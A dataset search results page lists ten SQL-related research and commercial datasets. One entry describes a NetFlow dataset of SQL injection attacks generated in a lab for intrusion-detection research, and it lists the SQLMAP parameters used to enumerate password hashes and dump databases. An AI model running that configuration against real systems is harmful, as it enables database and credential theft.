10 datasets found
  1. Search-Based Test Data Generation for SQL Queries: Appendix

    • zenodo.org
    • data.niaid.nih.gov
    zip
    Updated Jan 24, 2020
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Jeroen Castelein; Maurício Aniche; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen; Jeroen Castelein; Mozhan Soltani; Annibale Panichella; Arie van Deursen (2020). Search-Based Test Data Generation for SQL Queries: Appendix [Dataset]. http://doi.org/10.5281/zenodo.1166023
    Explore at:
    zipAvailable download formats
    Dataset updated
    Jan 24, 2020
    Dataset provided by
    Zenodohttp://zenodo.org/
    Authors
    Jeroen Castelein; Maurício Aniche; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen; Jeroen Castelein; Mozhan Soltani; Annibale Panichella; Arie van Deursen
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries: Appendix".

    The appendix contains:

    • The queries from the three open source systems we used in the evaluation of our tool (the industry software system is not part of this appendix, due to privacy reasons)
    • The results of our evaluation.
    • The source code of the tool. Most recent version can be found at https://github.com/SERG-Delft/evosql.
    • The results of the tuning procedure we conducted before running the final evaluation.
  2. j

    Data from: SQL Injection Attack Netflow

    • portalcienciaytecnologia.jcyl.es
    • portalcientifico.unileon.es
    • +3more
    Updated 2022
    + more versions
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián (2022). SQL Injection Attack Netflow [Dataset]. https://portalcienciaytecnologia.jcyl.es/documentos/668fc461b9e7c03b01bdba14
    Explore at:
    Dataset updated
    2022
    Authors
    Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián
    Description

    Introduction This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device. Datasets The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5. Dataset Aim Samples Benign-malicious
    traffic ratio D1 Training 400,003 50% D2 Test 57,239 50% Infrastructure and implementation Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes) Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet). The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table. Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
    The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we ran MariaDB version 10.4.12.
    Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

  3. D

    Database Testing Tool Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated Feb 9, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Archive Market Research (2025). Database Testing Tool Report [Dataset]. https://www.archivemarketresearch.com/reports/database-testing-tool-26309
    Explore at:
    pdf, ppt, docAvailable download formats
    Dataset updated
    Feb 9, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others. The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving the market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to the rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.

  4. WikiSQL (Questions and SQL Queries)

    • kaggle.com
    zip
    Updated Nov 25, 2022
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    The Devastator (2022). WikiSQL (Questions and SQL Queries) [Dataset]. https://www.kaggle.com/datasets/thedevastator/dataset-for-developing-natural-language-interfac
    Explore at:
    zip(21491264 bytes)Available download formats
    Dataset updated
    Nov 25, 2022
    Authors
    The Devastator
    License

    https://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/

    Description

    WikiSQL (Questions and SQL Queries)

    80654 hand-annotated questions and SQL queries on 24241 Wikipedia tables

    By Huggingface Hub [source]

    About this dataset

    A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.

    More Datasets

    For more datasets, click here.

    Featured Notebooks

    • 🚨 Your notebook can be here! 🚨!

    How to use the dataset

    This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same among all splits, and the file contains information on the phase, question, table, and SQL for each interface

    Research Ideas

    • This dataset can be used to develop natural language interfaces for relational databases.
    • This dataset can be used to develop a knowledge base of common SQL queries.
    • This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries

    Acknowledgements

    If you use this dataset in your research, please credit the original authors.

    Data Source

    License

    License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.

    Columns

    File: validation.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    File: train.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    File: test.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |

    Acknowledgements

    If you use this dataset in your research, please credit the original authors. If you use this dataset in your research, please credit Huggingface Hub.

  5. h

    synthetic_text_to_sql

    • huggingface.co
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Gretel.ai, synthetic_text_to_sql [Dataset]. https://huggingface.co/datasets/gretelai/synthetic_text_to_sql
    Explore at:
    CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset provided by
    Gretel.ai
    License

    Apache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
    License information was derived automatically

    Description

    Image generated by DALL-E. See prompt for more details

      synthetic_text_to_sql
    

    gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:

    105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.

  6. Z

    Supplementary data for "Enhancing Resource-based Test Case Generation For...

    • data.niaid.nih.gov
    Updated Jul 3, 2021
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Man Zhang; Andrea Arcuri (2021). Supplementary data for "Enhancing Resource-based Test Case Generation For RESTful APIs with SQL Handling" [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_5059927
    Explore at:
    Dataset updated
    Jul 3, 2021
    Dataset provided by
    Kristiania University College
    Authors
    Man Zhang; Andrea Arcuri
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Supplement to: Enhancing Resource-based Test Case Generation For RESTful APIs with SQL Handling

    In this repository, we provide tests and their coverage reports (conducted by Intellij coverage reports) that are used in the Discussion section of the paper.

  7. ReCiterAnalysis.sql.

    • plos.figshare.com
    txt
    Updated Jun 11, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole (2023). ReCiterAnalysis.sql. [Dataset]. http://doi.org/10.1371/journal.pone.0244641.s006
    Explore at:
    txtAvailable download formats
    Dataset updated
    Jun 11, 2023
    Dataset provided by
    PLOShttp://plos.org/
    Authors
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Database model for storing output of Feature Generator API. Includes some sample data. (SQL)

  8. d

    Data from: Automating pharmacovigilance evidence generation: Using large...

    • search.dataone.org
    • data.niaid.nih.gov
    • +2more
    Updated Feb 4, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Jeffery Painter; Venkateswara Chalamalasetti; Raymond Kassekert; Andrew Bate (2025). Automating pharmacovigilance evidence generation: Using large language models to produce context-aware SQL [Dataset]. http://doi.org/10.5061/dryad.2280gb63n
    Explore at:
    Dataset updated
    Feb 4, 2025
    Dataset provided by
    Dryad Digital Repository
    Authors
    Jeffery Painter; Venkateswara Chalamalasetti; Raymond Kassekert; Andrew Bate
    Description

    Objective: To enhance the accuracy of information retrieval from pharmacovigilance (PV) databases by employing Large Language Models (LLMs) to convert natural language queries (NLQs) into Structured Query Language (SQL) queries, leveraging a business context document. Materials and Methods: We utilized OpenAI’s GPT-4 model within a retrieval-augmented generation (RAG) framework, enriched with a business context document, to transform NLQs into executable SQL queries. Each NLQ was presented to the LLM randomly and independently to prevent memorization. The study was conducted in three phases, varying query complexity, and assessing the LLM's performance both with and without the business context document. Results: Our approach significantly improved NLQ-to-SQL accuracy, increasing from 8.3% with the database schema alone to 78.3% with the business context document. This enhancement was consistent across low, medium, and high complexity queries, indicating the critical role of contextual ..., Test set of NLQ's used in the paper Automating Pharmacovigilance Evidence Generation: Using Large Language Models to Produce Context-Aware SQL. Also included are the Python scripts for the LLM processing, the R code for statistical analysis of results, and a copy of the business context document and essential tables., , # Automating Pharmacovigilance Evidence Generation: Using Large Language Models to Produce Context-Aware SQL

    https://doi.org/10.5061/dryad.2280gb63n

    Description of the data and file structure

    NLQ_Queries.xls contains the set of test NLQs along with the results of the LLM response in each phase of the experiment. Each NLQ also contains the complexity scores computed for each.

    The business context document is supplied as a PDF, together with the Python and R code used to generate our results. The essential tables used in Phase 2 and 3 of the experiment are included in the text file.

    Files and variables

    File: NLQ_Queries.xlsx

    Description:Â Contains all NLQ queries with the results of the LLM output and the pass, fail status of each.

    Column Definitions:

    Below are the column names in order with a detailed description.

    1. User NLQ: Plain text database query
    2. Phase_1:Â Pass or Fail status indicator "Pass, Partial, or Fa...
  9. S

    MARIO MiLeadSafe Test

    • splitgraph.com
    Updated Jul 1, 2019
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    michigan-gov (2019). MARIO MiLeadSafe Test [Dataset]. https://www.splitgraph.com/michigan-gov/mario-mileadsafe-test-fqds-wwf8/
    Explore at:
    json, application/vnd.splitgraph.image, application/openapi+jsonAvailable download formats
    Dataset updated
    Jul 1, 2019
    Authors
    michigan-gov
    Description

    Testing Dynamic Table Generation with column fieldTypes

    Splitgraph serves as an HTTP API that lets you run SQL queries directly on this data to power Web applications. For example:

    See the Splitgraph documentation for more information.

  10. E-Commerce Data

    • kaggle.com
    zip
    Updated Aug 17, 2017
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Carrie (2017). E-Commerce Data [Dataset]. https://www.kaggle.com/datasets/carrie1/ecommerce-data
    Explore at:
    zip(7548686 bytes)Available download formats
    Dataset updated
    Aug 17, 2017
    Authors
    Carrie
    Description

    Context

    Typically e-commerce datasets are proprietary and consequently hard to find among publicly available data. However, The UCI Machine Learning Repository has made this dataset containing actual transactions from 2010 and 2011. The dataset is maintained on their site, where it can be found by the title "Online Retail".

    Content

    "This is a transnational data set which contains all the transactions occurring between 01/12/2010 and 09/12/2011 for a UK-based and registered non-store online retail.The company mainly sells unique all-occasion gifts. Many customers of the company are wholesalers."

    Acknowledgements

    Per the UCI Machine Learning Repository, this data was made available by Dr Daqing Chen, Director: Public Analytics group. chend '@' lsbu.ac.uk, School of Engineering, London South Bank University, London SE1 0AA, UK.

    Image from stocksnap.io.

    Inspiration

    Analyses for this dataset could include time series, clustering, classification and more.

  11. Not seeing a result you expected?
    Learn how you can add new datasets to our index.

Share
FacebookFacebook
TwitterTwitter
Email
Click to copy link
Link copied
Close
Cite
Jeroen Castelein; Maurício Aniche; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen; Jeroen Castelein; Mozhan Soltani; Annibale Panichella; Arie van Deursen (2020). Search-Based Test Data Generation for SQL Queries: Appendix [Dataset]. http://doi.org/10.5281/zenodo.1166023
Organization logo

Search-Based Test Data Generation for SQL Queries: Appendix

Explore at:
3 scholarly articles cite this dataset (View in Google Scholar)
zipAvailable download formats
Dataset updated
Jan 24, 2020
Dataset provided by
Zenodohttp://zenodo.org/
Authors
Jeroen Castelein; Maurício Aniche; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen; Jeroen Castelein; Mozhan Soltani; Annibale Panichella; Arie van Deursen
License

Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically

Description

The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries: Appendix".

The appendix contains:

  • The queries from the three open source systems we used in the evaluation of our tool (the industry software system is not part of this appendix, due to privacy reasons)
  • The results of our evaluation.
  • The source code of the tool. Most recent version can be found at https://github.com/SERG-Delft/evosql.
  • The results of the tuning procedure we conducted before running the final evaluation.
Search
Clear search
Close search
Google apps
Main menu